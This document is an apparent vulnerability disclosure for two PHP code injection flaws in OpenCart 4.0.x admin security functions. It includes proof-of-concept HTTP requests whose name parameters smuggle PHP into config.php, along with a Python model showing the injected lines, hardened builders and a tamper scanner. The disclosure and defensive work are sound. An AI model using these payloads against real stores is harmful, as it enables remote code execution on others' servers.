Description
What version of OpenCart are you reporting this for?
OpenCart versions 4.0.0.0 to 4.0.2.3
Describe the bug
There are two distinct static code injection vulnerabilities: one in the function that moves the storage folder outside the application web root, and one in the function that renames the secret admin path after installation. The latter can be exploited only if the admin folder has not yet been renamed, whereas the former can be exploited at any time, even if the storage folder has already been moved. Both vulnerabilities require that the user has the "access" and "modify" privileges for the common/security route. By exploiting them, an authenticated adversary can inject arbitrary static PHP code into the configuration files, which is then executed on every page load, resulting in remote code execution. Both vulnerabilities were introduced in OpenCart 4.0.0.0.
The storage() function in upload/admin/controller/common/security.php is vulnerable to PHP static code injection because the user-controlled variables $name and $path are concatenated into $base_new, which is then written into the config.php and admin/config.php files without proper escaping or validation.
The admin() function in upload/admin/controller/common/security.php is vulnerable to PHP static code injection because the user-controlled variable $name is placed inside $base_new, which is then written into a newly created config.php file without proper escaping or validation.
To Reproduce
Refer to the following article: https://0xbro.red/disclosures/disclosed-vulnerabilities/opencart-cve-2023-47444/#vulnerabilities-details-and-root-causes
PoC for common/security.storage:
Request 1:
GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
--- RESPONSE ---
HTTP/1.1 200 OK
{"next":"http:\/\/127.0.0.1:8888\/admin_secret\/index.php?route=common\/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned');phpinfo();#&path=\/home\/kali\/Projects\/OpenCart\/4.0.2.3\/&page=2"}
Request 2:
GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
--- RESPONSE ---
HTTP/1.1 200 OK
{"success":"Success: Storage directory has been moved!"}
PoC for common/security.admin:
Request 1:
GET /admin/index.php?route=common/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&page=1&name=foo%27);phpinfo();print(%27 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
--- RESPONSE ---
HTTP/1.1 200 OK
{"next":"http:\/\/127.0.0.1:8888\/admin\/index.php?route=common\/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&name=foo');phpinfo();print('&page=2"}
Request 2:
GET /admin/index.php?route=common/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&page=99&name=foo%27);phpinfo();print(%27 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
--- RESPONSE ---
HTTP/1.1 200 OK
{"redirect":"http:\/\/127.0.0.1:8888\/foo');phpinfo();print('\/index.php?route=common\/login"}
Expected behavior
User input should be validated before it is written into config.php: $name and $path should be restricted to an allow-list of safe characters, and any input containing characters that can terminate the PHP string literal (quotes, parentheses, semicolons) should be rejected rather than written verbatim.
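The following is an added example written for this page; it is not code from OpenCart or from the reporter. It models the config.php rewrite described in the root-cause paragraphs and the expected behaviour above: it reconstructs the define() line each PoC payload would produce, showing how the payload closes the single-quoted PHP string early, provides a hardened builder that allow-lists $name and $path and escapes the literal, and includes a scanner that flags define('DIR_...') lines in a config.php carrying code after the intended path literal (a useful post-incident check). Python is used so the example runs stand-alone. The exact define() line shapes, the allow-list policy and the sample config.php are assumptions and are not taken from security.php.

```python
"""Model of the config.php rewrite behind CVE-2023-47444 (added example, not OpenCart code).

The define() line shapes below are an assumption about the pattern the report describes
($base_new dropped into a single-quoted PHP string); they are not copied from security.php.
"""
import re

# URL-decoded values of the name= and path= parameters used in the PoC requests on this page.
STORAGE_NAME = "pwned');phpinfo();#"
STORAGE_PATH = "/home/kali/Projects/OpenCart/4.0.2.3/"
ADMIN_NAME = "foo');phpinfo();print('"

# Assumed allow-list policy: a directory name is letters, digits, underscore or dash only;
# an absolute POSIX path is made of segments that cannot start with '.', so '..' is rejected.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_-]+")
SAFE_ABS_PATH = re.compile(r"/(?:[A-Za-z0-9_-][A-Za-z0-9._-]*(?:/|$))*")

# Benign shape of a rewritten line: define('DIR_X', [DIR_Y . ]'<literal without quote or
# backslash>'); followed by nothing. Anything else on such a line is injected code.
BENIGN_DEFINE = re.compile(
    r"define\('(DIR_[A-Z_]+)',\s*(?:DIR_[A-Z_]+\s*\.\s*)?'([^'\\]*)'\);\s*$"
)


def vulnerable_storage_define(path: str, name: str) -> str:
    """Vulnerable pattern: $base_new = $path . $name . '/' concatenated straight into PHP source."""
    base_new = path + name + "/"
    return "define('DIR_STORAGE', '" + base_new + "');"


def vulnerable_admin_define(name: str) -> str:
    """Vulnerable pattern for the renamed admin folder; only $name is attacker controlled."""
    return "define('DIR_APPLICATION', DIR_OPENCART . '" + name + "/');"


def php_single_quoted(value: str) -> str:
    """Emit a PHP single-quoted literal; only backslash and quote are special in that context."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def validated_segment(name: str) -> str:
    """Reject any directory name outside the allow-list instead of stripping characters."""
    if not SAFE_SEGMENT.fullmatch(name):
        raise ValueError(f"rejected directory name: {name!r}")
    return name


def hardened_storage_define(path: str, name: str) -> str:
    """Allow-list both inputs, then escape anyway so the literal can never be terminated early.
    (Checking that the directory exists and is writable is a separate concern, omitted here.)"""
    if not SAFE_ABS_PATH.fullmatch(path):
        raise ValueError(f"rejected storage path: {path!r}")
    base_new = path.rstrip("/") + "/" + validated_segment(name) + "/"
    return "define('DIR_STORAGE', " + php_single_quoted(base_new) + ");"


def hardened_admin_define(name: str) -> str:
    """Hardened counterpart of vulnerable_admin_define()."""
    literal = php_single_quoted(validated_segment(name) + "/")
    return "define('DIR_APPLICATION', DIR_OPENCART . " + literal + ");"


def is_rejected(builder, *args) -> bool:
    """True when a hardened builder refuses the input with ValueError."""
    try:
        builder(*args)
    except ValueError:
        return True
    return False


def find_tampered_defines(config_php: str) -> list[str]:
    """Post-incident check: return every define('DIR_...') line that does not have the benign
    shape, i.e. where extra PHP follows the intended path literal."""
    hits = []
    for raw in config_php.splitlines():
        line = raw.strip()
        if line.startswith("define('DIR_") and not BENIGN_DEFINE.fullmatch(line):
            hits.append(line)
    return hits


# Constructed sample config.php (not a real OpenCart file): the last line is what the storage
# PoC payload would leave behind. '#' starts a PHP comment, so the trailing /'); is swallowed.
SAMPLE_CONFIG_PHP = """<?php
define('HTTP_SERVER', 'http://127.0.0.1:8888/admin_secret/');
define('DIR_OPENCART', '/var/www/opencart/');
define('DIR_APPLICATION', DIR_OPENCART . 'admin_secret/');
define('DIR_STORAGE', '/var/www/storage/pwned');phpinfo();#/');
"""

if __name__ == "__main__":
    print(vulnerable_storage_define(STORAGE_PATH, STORAGE_NAME))
    # In the admin payload, print(' re-opens a string so the trailing /'); closes it cleanly.
    print(vulnerable_admin_define(ADMIN_NAME))
    print(find_tampered_defines(SAMPLE_CONFIG_PHP))
    print(hardened_storage_define("/var/www/storage", "oc_store"))
    print(is_rejected(hardened_storage_define, STORAGE_PATH, STORAGE_NAME))
```

Running the script prints the two injected define() lines exactly as the PoC payloads would write them, flags the tampered DIR_STORAGE line in the constructed config.php, and shows that the hardened builders refuse both payloads while still producing a clean line for an ordinary directory name. The scanner only inspects define('DIR_...') lines because those are the ones the two vulnerable functions rewrite.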
Screenshots / Screen recordings
https://youtu.be/auTky_gm8Rk
https://youtu.be/6if6Kfsb2oM